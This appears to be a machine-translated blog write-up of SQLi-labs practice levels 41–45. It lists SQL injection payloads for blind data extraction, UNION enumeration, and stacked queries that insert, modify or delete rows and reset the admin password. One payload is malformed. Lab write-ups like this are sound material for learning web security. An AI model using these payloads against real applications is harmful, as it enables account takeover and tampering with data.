当前位置:网站首页>SQL Lab (41~45) (continuous update later)
SQL Lab (41~45) (continuous update later)
2022-07-07 12:24:00 【hcjtn】
(41~45)
sql-lab-41
And 40 It's the same , Using stack injection , Time blind note , We found that it was just the different way of wrapping
Resolve table name :?id=1’ and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e
Resolve field name :?id=1’ and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i
therefore , We try to insert a statement :
?id=1;insert into users(id,username,password)values(20,‘hcjtn’,‘1234’)-- q
We can also try to modify the statement we just inserted :
?id=1 ;update users set username=‘tn’ where id=20-- q
Then try to eliminate it :
?id=1;delete from users where id=20 – q
sql-lab-42
open 42 Turn off , We found that it is very similar to the previous secondary injection interface
At that time, we were new users , Use secondary injection to carry out a sql The ginseng , But this level does not allow us to create new users ,
So we need to find its injection point above : When we're in password On the input ’or 1=1 – q
It is found that its injection point is password On
therefore , We can inject changes with stack admin password
First step : Determine its table name and Name
Name of judgment table :
’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ #
Found to have emails,referers,uagents,users Three tables
Judge the listing :
’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’-- q
Find out users There are id,username,password Three column names
Then we use stack injection to change the administrator password :
’ ;update users set password=‘hcjtn’ where username=‘admin’#-- q
Then input admin And password hcjtn I found that the landing was successful
sq-lab-43
and sql-lab-42 The same first segment injection point , stay password On the input ’)or 1=1# I found that the landing was successful It is found that the injection point is password On
43 Guan he 42 The difference of closing is only the difference of closing mode
The rest are exactly the same
The first is to judge the table name and column name :
Name of judgment table :
') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ #
Judge the listing :
') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘security’ and table_name=‘users’#
Use stack injection to change the administrator password :
1’);update users set password=‘hcjtn’ where username=‘admin’#
sql-lab-44
It's the same interface again ,
First judge the injection point when we are password On the input ’or 1=1 – q, I found that the landing was successful
Injection point :password
This level and 42 The difference is : There is no obvious visual sign of error reporting in this level
So we can only use Boolean blind note :
Resolve library name :
'or (ascii(substr((database()),1,1)))=115#
Description the first digit of the database name is s
'or (ascii(substr((database()),2,1)))=101#
Description the first digit of the database name is e
Name of judgment table :
'or (ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)))=101-- q
Found to have emails,referers,uagents,users Three tables
Judge the listing :
'and (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q
Find out users There are id,username,password Three column names
And then change admin Password :
';update set password=‘hcjtn’ where username=‘admin’#
Click , boring
sql-lab-45
The injection point is possword On :’)or 1=1 #
Use time blind injection
Resolve database name :’)or if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s
Resolve table name : ')or if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e
Resolve field name :’ )or if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i
get data : ')or (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q The first is i
边栏推荐
- 18 basic introduction to divider separator component of fleet tutorial (tutorial includes source code)
- What are the technical differences in source code anti disclosure
- wallys/Qualcomm IPQ8072A networking SBC supports dual 10GbE, WiFi 6
- Attack and defense world - PWN learning notes
- Superscalar processor design yaoyongbin Chapter 8 instruction emission excerpt
- Steps of redis installation and self startup configuration under CentOS system
- How to connect 5V serial port to 3.3V MCU serial port?
- The function of adding @ before the path in C #
- Attack and defense world ----- summary of web knowledge points
- TypeScript 接口继承
猜你喜欢
ENSP MPLS layer 3 dedicated line
Hi3516 full system type burning tutorial
即刻报名|飞桨黑客马拉松第三期盛夏登场,等你挑战
SwiftUI 教程之如何在 2 秒内实现自动滚动功能
[data clustering] realize data clustering analysis based on multiverse optimization DBSCAN with matlab code
Problem: the string and characters are typed successively, and the results conflict
超标量处理器设计 姚永斌 第9章 指令执行 摘录
Mise en œuvre du codage Huffman et du décodage avec interface graphique par MATLAB
《看完就懂系列》天哪!搞懂节流与防抖竟简单如斯~
Improve application security through nonce field of play integrity API
随机推荐
"Series after reading" my God! It's so simple to understand throttling and anti shake~
ES底层原理之倒排索引
Simple network configuration for equipment management
[data clustering] realize data clustering analysis based on multiverse optimization DBSCAN with matlab code
wallys/Qualcomm IPQ8072A networking SBC supports dual 10GbE, WiFi 6
Swiftui tutorial how to realize automatic scrolling function in 2 seconds
[shortest circuit] acwing 1127 Sweet butter (heap optimized dijsktra or SPFA)
从工具升级为解决方案,有赞的新站位指向新价值
Introduction to three methods of anti red domain name generation
NPC Jincang was invited to participate in the "aerospace 706" I have an appointment with aerospace computer "national Partner Conference
Typescript interface inheritance
<No. 9> 1805. Number of different integers in the string (simple)
Tutorial on principles and applications of database system (010) -- exercises of conceptual model and data model
NGUI-UILabel
Up meta - Web3.0 world innovative meta universe financial agreement
Attack and defense world - PWN learning notes
Sort out the garbage collection of JVM, and don't involve high-quality things such as performance tuning for the time being
30. Few-shot Named Entity Recognition with Self-describing Networks 阅读笔记
(to be deleted later) yyds, paid academic resources, please keep a low profile!
Several methods of checking JS to judge empty objects